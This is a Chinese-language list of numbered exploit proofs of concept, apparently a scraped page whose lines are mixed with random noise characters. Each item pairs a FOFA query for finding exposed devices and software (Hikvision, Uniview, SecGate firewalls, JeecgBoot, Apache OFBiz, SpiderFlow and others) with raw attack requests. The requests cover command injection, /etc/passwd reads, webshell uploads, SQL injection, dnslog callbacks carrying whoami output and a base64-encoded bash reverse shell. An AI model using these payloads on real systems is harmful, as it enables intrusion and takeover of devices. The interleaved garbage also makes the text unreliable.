FOFA:BYTEVALUE 智能流控路由器
3 U# [7 p f/ ~* {; G" W& }* VGET /goform/webRead/open/?path=|id HTTP/1.1
/ w! l$ h3 s3 u, ]& lHost:IP
, y( i9 s2 |2 x; RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 A' _* ^0 A) H# e9 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 c0 @5 d) B& P j9 I% O; FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* r4 a* e5 H3 B; p1 k
Accept-Encoding: gzip, deflate( p( r6 y) o! [- h
Connection: close
# {- O: _0 ^8 n/ A2 m; zUpgrade-Insecure-Requests: 1( @6 f2 M6 x0 e2 D, P* Y1 c/ p7 s
& u, |0 T" ] `; @3 p
/ N& U) m$ k0 T
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 y$ |% l9 F: v4 C% q' E3 f5 _# mFOFA:app="速达软件-公司产品"0 P7 N: P1 ^: ~7 @; u
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1 C Q9 q* A. n; T
Host: x.x.x.x
* y: M- [% m" u& V* IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* L1 Z+ P- I( F( B
Content-Length: 27
' C2 N2 ?$ Z2 i- qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# G; T) O+ g/ i. h$ u/ ?, P# U `
Accept-Encoding: gzip, deflate+ d l* j( Z5 P1 ?: @5 I8 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# P" {% a* _+ j( q2 eConnection: close
9 Q2 o- U m" ^% |0 {( gContent-Type: application/octet-stream
5 Y N w3 b0 y4 {9 T( ?! N% QUpgrade-Insecure-Requests: 11 }9 K+ p, D2 x" M. J9 z" H( P
" x, X+ X" \' Y9 T
<% out.print("oessqeonylzaf");%>5 f1 w$ H. |3 ^' } j: X
0 n$ j5 r4 Y8 f& q2 T( z
6 D& k1 Z8 |* K* j
GET /xykqmfxpoas.jsp HTTP/1.1
; q7 Z+ R+ l2 v+ _( DHost: x.x.x.x6 A6 l0 J# o6 u/ z& N8 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 J [: |& c, I. A+ M5 A! l3 Y4 a; \
Connection: close
7 h" q8 d9 ]! L( X6 w, t/ SAccept-Encoding: gzip
: w: m+ t# h+ v) l# `5 }3 y* R/ E5 G
3 G0 x# b! R. X81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& }8 y. r7 j, G6 A
FOFA:app="uniview-视频监控"3 n6 A7 G/ [. q9 ~; z! D) s
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
/ o$ y. J( t9 A' p% }3 hHost: x.x.x.x
3 E* |, T; `9 m7 L1 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 M' m8 q& I, K
Connection: close
+ n. [- k( w& W2 ?& XAccept-Encoding: gzip. n8 T, C" ^3 l0 U+ R6 z
& k1 r! D7 e9 t3 z+ W
( |& @9 I+ W3 ]* L
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
' B( }% z, x2 J: GFOFA:app="思福迪-LOGBASE") A5 J9 D6 L9 R! A
POST /bhost/test_qrcode_b HTTP/1.1
. r* U$ r) n- G3 o: QHost: BaseURL
" [' s3 g* X6 `/ x" m) _# aUser-Agent: Go-http-client/1.1
! e; ~' E, q8 D' g. z N; }7 iContent-Length: 23# L9 z) c+ X- g0 S
Accept-Encoding: gzip6 R: J# }% A1 d
Connection: close( _0 U2 o4 h4 H0 O
Content-Type: application/x-www-form-urlencoded
& M" w: K( h! V2 g( o: UReferer: BaseURL
: l( s ]: \1 x) m6 W& b) c4 H( x& P7 A0 [
z1=1&z2="|id;"&z3=bhost4 n n( M. A4 V1 N
0 G A$ Z% m! }
& D* v' l) X8 I% B( B
83. JeecgBoot testConnection 远程命令执行
) E% ^# _& k! I9 h5 c0 }FOFA:title=="JeecgBoot 企业级低代码平台"
. P0 }: ^) d7 V2 J% i, |. e" D; R
: r$ q+ A2 ?1 m, B. ~4 G) H7 s T) H! w6 ]
POST /jmreport/testConnection HTTP/1.19 ?0 W3 o* l$ L; f# u
Host: x.x.x.x
% d0 {6 t, q1 `& |3 z% NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% p7 \' X, T: j r% c5 J$ XConnection: close
5 l- u" `- l" t" X* L6 ^, ^Content-Length: 8881
- w4 L a2 k, f) N/ I7 R" s- E7 V; DAccept-Encoding: gzip
. R0 H1 B! \; f5 E0 C. K3 r3 uCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
& ?& ~9 Q1 g* U1 j* \7 Y( v6 `+ JContent-Type: application/json" q% D9 T' l2 ?/ f- H" j! X! R
1 a) ^% O, b7 k% E. n/ U7 k# y
PAYLOAD
! b0 s. @4 H; H% k3 _2 u. F+ o7 S$ P0 P, ~1 U1 M
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入: P6 V) m* Y, _# V! M
FOFA:title=="JeecgBoot 企业级低代码平台"
7 S' @+ y& S1 O1 s, N' F/ f; P3 B# j. N& @8 x! J7 C
4 e# H: x, q7 E9 E( d. ]9 Y) G
+ C/ g* ^* c! v2 D
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
6 _# k% u$ J" RHost: 192.168.40.130:8080" j+ \% T- r) {, s
User-Agent: curl/7.88.1
6 S0 U8 N6 | X$ `# l& A8 }! L L3 |: FContent-Length: 156
/ q4 \! p# ~8 {; B; @& VAccept: */*# Y/ }1 Z( Z( A. ?# d- ~
Connection: close5 d% v: m1 T" P, U! O8 r
Content-Type: application/json5 x6 o0 N* Y x
Accept-Encoding: gzip
" w1 ?6 p- ?/ M8 H) B1 M( v$ C+ ~2 f: t# E. k% u$ P
{* \$ s, E: j2 ?: k( x+ h
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",0 f% G' V% E [: k+ X- o+ ?
"type": "0"0 f1 {9 d, Z& ]+ R& f- j- F7 h: T
}+ v: C/ {: M4 v) o& e5 v y t
! ?$ a" F, t( {. c9 W$ r3 h: C; T# c, |3 h' S; Y
85. SysAid On-premise< 23.3.36远程代码执行; K- A: ^ H) o! [$ F
CVE-2023-47246
X- l6 U2 `& G- _. F5 v! _" \FOFA:body="sysaid-logo-dark-green.png" 3 e9 r! ]+ x7 i! d& w D# t
EXP数据包如下,注入哥斯拉马) M- h0 C7 _3 Y1 M; z' [5 s; x, J
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1& ^7 G w" X1 B" H
Host: x.x.x.x9 A# F7 W" K1 ~# a6 y5 b C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ \ f6 H4 N1 C5 `) nContent-Type: application/octet-stream
k& u) a+ r5 o, G% BAccept-Encoding: gzip7 R$ a- E6 ^; f
" U- @" I, [! `4 |. x) VPAYLOAD
2 X8 x4 T3 D( x, l$ j: p% Y( E5 d# W% f) k+ J: O1 e( Y
回显URL:http://x.x.x.x/userfiles/index.jsp
& g+ q+ S# i! M, z$ j% e
9 A! |4 B2 H3 W" u( q; C86. 日本tosei自助洗衣机RCE
6 q. ^9 `: X9 K# wFOFA:body="tosei_login_check.php"$ W* b. H1 X2 W% k0 n
POST /cgi-bin/network_test.php HTTP/1.1
( C. d Q- T$ @) T+ S; yHost: x.x.x.x
) ], ^ U% z! |. q5 tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. o; s7 E7 U# G8 i1 ~ @
Connection: close
' n8 ]: q& q- V b7 h+ |Content-Length: 445 Y( Q8 J1 x6 Q" ~* e7 U
Accept: */*! q2 f/ S5 w% ~1 g; b3 e
Accept-Encoding: gzip/ P7 k0 t/ I# M& x d _: w- K3 H
Accept-Language: en
2 O) M+ o, N0 d9 k5 x+ rContent-Type: application/x-www-form-urlencoded% M. q3 L/ v' |4 J0 E+ E( e% ?
1 C! T) j2 o( n- G, @& ]* R" F& J8 ahost=%0acat${IFS}/etc/passwd%0a&command=ping
: h0 ^4 ~. v5 w. y* E E+ n7 f, @# O2 V7 h7 h% L
; T) ?- M; ?! c: R2 z$ ]) U) L
87. 安恒明御安全网关aaa_local_web_preview文件上传
; V9 M6 ^6 i; z! h: l# q* xFOFA:title="明御安全网关"
+ \# ^7 o* U5 n! b' Y6 q% K: ?; RPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 ~- v2 O* Q- S. Q' t6 \Host: X.X.X.X* B& U4 O# G6 E2 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ E6 V, S0 f+ |( O! o' Z6 C' r
Connection: close
! d- Q5 j6 `1 Y" ~; k! |% n3 `5 RContent-Length: 198
$ R# a' [+ e) q& @) I1 rAccept-Encoding: gzip' i' ?, v( J( P3 Z! F
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd+ [1 V* D3 ]( K. j
4 d- J- Y4 D e/ ` T, l# n
--qqobiandqgawlxodfiisporjwravxtvd
7 f, G7 Y7 Y* K8 r8 b8 AContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"! u' n) G+ K2 ~! _% W
Content-Type: text/plain+ ? e. O3 D2 u9 C+ `
/ X) B7 I3 [1 F8 q. R/ r& j" w2ZqGNnsjzzU2GBBPyd8AIA7QlDq
/ o( |3 \: q/ J* [- Y--qqobiandqgawlxodfiisporjwravxtvd--
8 j- Y# r% i$ A8 F6 H
1 G5 [0 S- H8 L* U X2 h. p* f) p2 |3 |; a( Z7 b" q f' Q
/jfhatuwe.php# o/ }7 \" \4 N" l9 p
# y2 B" ~" x5 K) x& w3 r: I
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 g! W9 h7 V! _% iFOFA:title="明御安全网关"
8 a% P2 Z3 g, _1 v, g6 P* OGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1( C: C+ F8 T) Z" y" z" y' I: r5 X8 ]7 V
Host: x.x.x.xx.x.x.x
$ h8 O; G$ N7 ?& A7 s2 U5 l+ M8 n7 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! x, N5 K( u$ o1 B# X+ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; C! X6 P4 ]; V7 c5 b6 L
Accept-Encoding: gzip, deflate
; R4 B* B, g/ l- H8 f2 Y- n6 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# g1 o4 F7 D* B! H) c. ~
Connection: close. [$ Z8 R4 N, ]
# J; ?2 k2 k' n0 g) g
3 f2 o) K# ?( j' q
/astdfkhl.php( O8 t& ~7 a0 K' y p
0 T! x2 D2 |+ e6 s
89. 致远互联FE协作办公平台editflow_manager存在sql注入
+ r" @: {' B% j7 P5 fFOFA:title="FE协作办公平台" || body="li_plugins_download"
4 B; K; C+ N; W$ J" |& h8 \! WPOST /sysform/003/editflow_manager.js%70 HTTP/1.1( B! x5 n8 [' y8 f( z
Host: x.x.x.x
0 @/ l" `* {- _) wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! U5 w0 E% @' x# ?6 h7 w+ L6 A
Connection: close
+ E$ O( [% k% ~$ o Q3 d6 JContent-Length: 418 y- H. Q! g" j( o% ?
Content-Type: application/x-www-form-urlencoded$ \4 V5 q: t& m3 x! w q( |1 g
Accept-Encoding: gzip
+ s. D$ I( Y/ L
4 w4 j* W6 |; T$ ~8 Q9 u L3 Toption=2&GUID=-1'+union+select+111*222--+
& i/ X, m/ y; T* m: Q% }7 ?/ F' C, S. `
) z: W \& k2 V2 w* K
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行. U, L8 k6 ~; x' @' [
FOFA:icon_hash="-1830859634". K* d; N3 q5 t9 {- M4 A F
POST /php/ping.php HTTP/1.1, N L/ h) Q: u! A
Host: x.x.x.x
5 g; u) D$ f+ V6 w- W: IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 U" _" \" T9 i6 W0 PContent-Length: 51 A. c1 h6 M( c0 U7 H; R
Accept: application/json, text/javascript, */*; q=0.01 h1 s7 I3 r3 w$ b. q0 |: x6 X- s
Accept-Encoding: gzip, deflate9 H5 R# _ `/ f) S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& L9 n4 f% u w
Connection: close; w+ V1 U% f$ a. s( n
Content-Type: application/x-www-form-urlencoded3 a- D6 Y6 Z4 k
X-Requested-With: XMLHttpRequest
1 Q" Q( e! S R& h- B% _5 Z3 U) E( x F" P3 s5 u# q, S+ `
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig- h, D6 y* W' J1 g
, d L& @( a1 @: J# b) I
7 k0 ~. {. Y( J4 u1 _91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取0 T/ U- q/ q1 d
FOFA:title="综合安防管理平台"
( y9 l1 L7 @# d7 q, aGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1 U# {' T$ _% A
Host: your-ip
+ s8 ^6 r9 i8 q* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 d8 E. `: |6 Q, a# ]+ @8 T
Accept-Encoding: gzip, deflate
- k6 F0 ~; E4 _2 }Accept: */*
; v" l* L8 _0 Z8 uConnection: keep-alive
0 L* ]# `* m# P3 C! [6 z' y4 f
1 K; L" W3 K5 U7 P# g ^8 S3 |6 a
+ {# M3 d' V; l8 f+ N1 R
92. 海康威视运行管理中心session命令执行7 g! V2 s, |( A" p3 d) P. M
Fastjson命令执行
9 `5 K2 x/ E( \( h. p7 v+ phunter:web.icon=="e05b47d5ce11d2f4182a964255870b76": b% H( H0 }( @) m D
POST /center/api/session HTTP/1.1; G7 u/ R) ?; L# v5 p
Host:
4 J1 A3 I3 h- a1 R9 t. k5 G: ]Accept: application/json, text/plain, */*
* N$ {/ z9 d, g& q. zAccept-Encoding: gzip, deflate
$ P4 w$ P- R4 r( `5 S, }X-Requested-With: XMLHttpRequest6 O. \( b- o2 x8 }
Content-Type: application/json;charset=UTF-88 Q* a" ~! |& L/ U
X-Language-Type: zh_CN& }# M6 q' Y9 L1 L
Testcmd: echo test9 ]; D* x( t. F/ n# W. d, s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.363 h2 v; B# j9 S% U+ `3 T" H
Accept-Language: zh-CN,zh;q=0.9
- @0 f$ e# t' y( Y5 E5 CContent-Length: 5778
- F0 @2 r R, s1 i1 L
8 R& I$ k( l5 |0 ?PAYLOAD3 K7 Q2 ]: L+ w6 F' ^+ H
- H P1 C& d# Y3 c
( z z8 `0 V# h6 `4 |7 ~
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! W+ g6 X) f) F8 Z9 X% r! v/ a$ X. rFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
3 P2 @# F! ^4 k2 m( m u0 UPOST /?g=app_av_import_save HTTP/1.1" {( C9 i, v. X1 @
Host: x.x.x.x
. }5 Y! U- e/ X. y% KContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx0 q' ^1 O" i+ E" U: m: H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ U* e/ e9 ~4 `; I. x& \% M7 @* @6 n! ?3 z4 w( B# x; d, r3 K
------WebKitFormBoundarykcbkgdfx
- i) Y8 A, j, u6 o9 `+ A: KContent-Disposition: form-data; name="MAX_FILE_SIZE"
6 C0 e) j, _) v9 G2 y8 z: Z; W) r7 k! E+ m8 b. ^& {; L8 }
10000000
+ K, Q+ p# Q2 `! ?6 i$ B6 m5 p------WebKitFormBoundarykcbkgdfx
! e6 D1 Q% q( J* R' N" qContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt": O. |) F9 u4 H( ?
Content-Type: text/plain
/ _0 C+ S. ?3 K1 c" y, R* h; I3 `3 `" S& v: J1 {" y
wagletqrkwrddkthtulxsqrphulnknxa
* O" P8 U6 j& h4 [* `6 d------WebKitFormBoundarykcbkgdfx$ X. [$ ^) U) i+ e6 X8 z3 q8 L5 R
Content-Disposition: form-data; name="submit_post"
' h3 \% K3 G. a9 b' F7 l, a2 `; i
$ \2 h$ a" b6 `. I! tobj_app_upfile o. W9 E/ N# k: x! Z
------WebKitFormBoundarykcbkgdfx
! h6 r _! `, H/ s+ U9 uContent-Disposition: form-data; name="__hash__": Z$ o) N- e2 X
9 A5 T% f _' U Q! k0b9d6b1ab7479ab69d9f71b05e0e9445
( q$ o$ v7 I# D------WebKitFormBoundarykcbkgdfx--+ ~. F" ~2 [/ `7 x% i, D% z
: i0 C5 |; k5 Y; T5 E4 K ^; W0 }. V0 h. W
GET /attachements/xlskxknxa.txt HTTP/1.18 d: \( F) y. S6 W
Host: xx.xx.xx.xx1 L7 S& j. H. P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) }& y0 i4 p5 `0 s
( L3 i+ L* J" X# }; K3 ], w% j! k0 W% I0 J5 i
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传3 n4 [7 @4 O+ |
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
; J) g( ~# b# Z- w0 f* NPOST /?g=obj_area_import_save HTTP/1.1% Q+ o& s- b3 T2 e+ g
Host: x.x.x.x
0 b$ ~% Z# @7 [& wContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt v- u2 s$ }8 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 W( a% }( Z. ]7 \% c$ c v
& F+ f2 b; X/ N% s# Y% V9 e- Z6 V------WebKitFormBoundarybqvzqvmt
% S: C( o. e5 nContent-Disposition: form-data; name="MAX_FILE_SIZE" x( T9 x3 {: s' [- `
& H4 j7 D. r# v1 j, [: @* W10000000* ]2 U1 C) B ^3 X" @! n/ l x) q
------WebKitFormBoundarybqvzqvmt- q& o7 N4 {/ s/ P- q1 x
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
! ?, _3 B3 P' K: |9 Y f c- o) _Content-Type: text/plain
% a3 Z i% B) d; B4 [& D# Y/ O" q, g3 j v9 k- F c: z
pxplitttsrjnyoafavcajwkvhxindhmu
$ g$ D. L. J1 H& ~. V1 J------WebKitFormBoundarybqvzqvmt
; B" l- o& c( Z9 `Content-Disposition: form-data; name="submit_post"' n, O2 E2 O$ v1 o) U$ V. {! _/ q
5 T- E9 ^1 j( Y' ~
obj_app_upfile: Q+ r* f# B8 w7 y! A7 ~$ L: J
------WebKitFormBoundarybqvzqvmt- E* i! d; g0 l0 |" l, y4 u: n" A t: _9 S
Content-Disposition: form-data; name="__hash__"2 w* s, {! `" q M' a
! R. Z& Y I \+ b; t% f( ~0b9d6b1ab7479ab69d9f71b05e0e9445- D- j7 |. f0 j ^/ C! Z
------WebKitFormBoundarybqvzqvmt--6 z4 h4 c. R! }! ?4 \5 O, g7 A, i
# L+ T( a8 q" q* K3 h: {- _) @
) z% }6 C+ J) X! i, f- O8 Z4 ^& r) x9 {- @
GET /attachements/xlskxknxa.txt HTTP/1.1& U7 g- B( d$ D: Y2 k
Host: xx.xx.xx.xx
6 T+ u6 q$ A2 M5 Y' ?+ R8 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ `1 ?% P: H- ~9 ~7 p0 s( n
$ D3 @( K3 {, L% M0 ]/ I2 S2 ~9 [2 j2 B/ U" |
N6 Y2 N* Z) G6 U1 E95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
, H1 Z+ p2 S4 E. ?4 x: ICVE-2023-49070( r0 \" w3 O/ V- T% G
FOFA:app="Apache_OFBiz"
5 N7 M& z! q8 s/ Q2 r i7 xPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
! [4 n6 M# Z8 B5 \# |Host: x.x.x.x" T* }4 v7 g6 ]9 J6 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. o. {# g; X; F" M; x/ [, n: N
Connection: close. S) K: t2 e% z+ y
Content-Length: 889
/ f7 K0 n1 P& O" x% H* LContent-Type: application/xml& |$ Q" d9 A: {7 C, |5 i4 v0 ^
Accept-Encoding: gzip0 M+ E- p2 K. z& G/ K8 T
" u- J) N7 v% J" ]% Z2 N<?xml version="1.0"?>& e& J- E7 f" C' E- R- q
<methodCall>
r% e4 P e$ p# m. W <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) b2 i8 ~& u4 Q! f
<params>
1 D2 K, C7 _& o' K8 e# y <param>
/ o) _6 _- T; @1 E( E <value>& g; v: @5 E+ @1 A3 d( }
<struct>
8 v+ b+ L5 q' Z" s5 \. _: } <member>0 L1 {( E5 e" V4 @8 i5 s
<name>test</name>
% B$ }7 S! n+ o" t6 o9 O <value>; n( Z/ e6 n9 N: [4 c
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># d' R$ b! `9 C
</value>. ~" Y: F3 r+ i, ]
</member>8 D: Q+ o+ {0 R
</struct>
) q& r* v; _4 \' F" _ </value>
8 v0 \' C! S! Y </param>
+ E+ _" G9 c% h# d: m" H# B </params>
) y j* x2 k4 ?# {( d</methodCall>
6 ]+ i5 }, d5 y2 ]% {4 |* ^. g
6 G+ \0 |# S! z; R2 k6 d) L用ysoserial生成payload8 G) Y8 s+ Z1 D5 Y* \
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
& Z2 Y3 b; f1 _# {: h: U, Z# E2 i! n4 [/ |
" v( D$ ~2 ^; s0 {+ y: S
将生成的payload替换到上面的POC- m# i, u. |# R% x
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.12 E5 M6 c8 b- \" _$ @; l
Host: 192.168.40.130:8443
7 I# r; d( m/ h/ h) l7 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: F2 |5 G8 w( f/ T7 A5 {' kConnection: close
( q2 f. T' [- V+ e* y5 qContent-Length: 889
: v# ^- e( R! q- b1 oContent-Type: application/xml0 Y1 w- T% D1 O' Y
Accept-Encoding: gzip
0 }2 n, k6 W7 q+ f2 }
* w- t0 d. n' O/ K, U4 J7 k/ G/ vPAYLOAD
% Z5 j& V/ n* j0 C0 A" w) `! j* s/ v7 n& }
96. Apache OFBiz 18.12.11 groovy 远程代码执行
1 t% ?7 l& s$ Z% K( ?% Y3 i% SFOFA:app="Apache_OFBiz"- h$ W5 w+ |* ^9 ]" p# }4 ?3 @
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.10 s C/ O3 U! V: V) F) R
Host: localhost:8443
/ @* _2 O$ T8 U) ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
O3 @. d: i: j" s6 JAccept: */*
; S; V n) t; OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ \/ q5 G# J% p; V/ nContent-Type: application/x-www-form-urlencoded, T, j- ?5 c1 b5 ]$ S7 I. `
Content-Length: 554 T; v: b& c j; X; `
+ M5 J* F, u5 |+ F/ |8 Y1 \groovyProgram=throw+new+Exception('id'.execute().text);# M4 p4 `4 ~( |0 [6 q6 f
5 } a+ b3 y& v: J
5 J4 h9 J% r# \" _+ @) a* L% D D反弹shell
$ f0 s- H; j( i l在kali上启动一个监听( }& N+ O1 G; M+ @2 z
nc -lvp 7777: X3 b$ q% s3 R+ p9 a
2 U y3 h6 [# ? g, y( JPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- B8 R/ K" J7 ?: Y0 }2 a1 ]
Host: 192.168.40.130:84436 y4 d* @7 h- q# i$ K6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' t7 I/ J- Z; o5 u4 T v( t+ X
Accept: */*
- t; c* i8 c; W0 e* b0 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% n e/ d2 y" ^4 ]) @! t3 QContent-Type: application/x-www-form-urlencoded
4 E6 m) o4 x! Q$ O5 R) Z5 `' XContent-Length: 71
1 P$ b- H4 U* I* X( B# o, ^+ K4 y2 D- U) j0 ]) D
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();' C6 G6 I9 b7 [5 m. F
/ ]3 O# w7 q8 N1 y* e3 }. @, ^) W97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: Z. O# A8 x; ?* V0 f7 L
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
8 N2 f' b* t5 m# }GET /passport/login/ HTTP/1.1; w" L7 D' G( z: N2 ^0 v- r# B6 E& S
Host: 192.168.40.130:8085/ H& Y" U* b3 C9 R: }6 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: G9 E- t% _4 T$ ^
Accept-Encoding: gzip- t: j) C1 ?+ q5 F/ ~0 ~
Connection: close' ^# q8 L+ s4 f
Cookie: rememberMe=PAYLOAD
J" f1 a7 `6 D' T; }X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
7 L" m6 F( |2 D& [" e
* \2 v) K! M, W$ H: B3 O3 z
. y# S# a6 Z4 @% d$ r98. SpiderFlow爬虫平台远程命令执行" s* I/ e; V U3 v0 w, h5 H
CVE-2024-0195
7 j0 {5 K6 `- k+ UFOFA:app="SpiderFlow"
/ z: l/ C2 b5 D) v- _POST /function/save HTTP/1.14 N) w! {' s: `2 ^. ~
Host: 192.168.40.130:80883 K8 y- U5 I# M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: t: U" D/ D5 N. z6 w5 \Connection: close
& p: |6 V ]& L/ LContent-Length: 121& A- k9 w0 }5 k/ ^8 _) V
Accept: */*8 |$ u" l* y" w( l/ H L2 f( s' p
Accept-Encoding: gzip, deflate
9 J3 {5 h1 e* q6 n- h6 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 H, P8 m9 E$ @7 bContent-Type: application/x-www-form-urlencoded; charset=UTF-81 n5 O9 [) e! B7 ?
X-Requested-With: XMLHttpRequest
) R) X9 ~ c! S5 i7 A' d: [! u3 {" ^" x+ e
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B0 J; W7 ~& V# l! v: H7 v* f
0 {3 D6 A; l6 I) g
4 u( k/ F+ a5 T/ L7 w& U, e99. Ncast盈可视高清智能录播系统busiFacade RCE
# M9 K h* f% a% q" k, G) G) qCVE-2024-0305
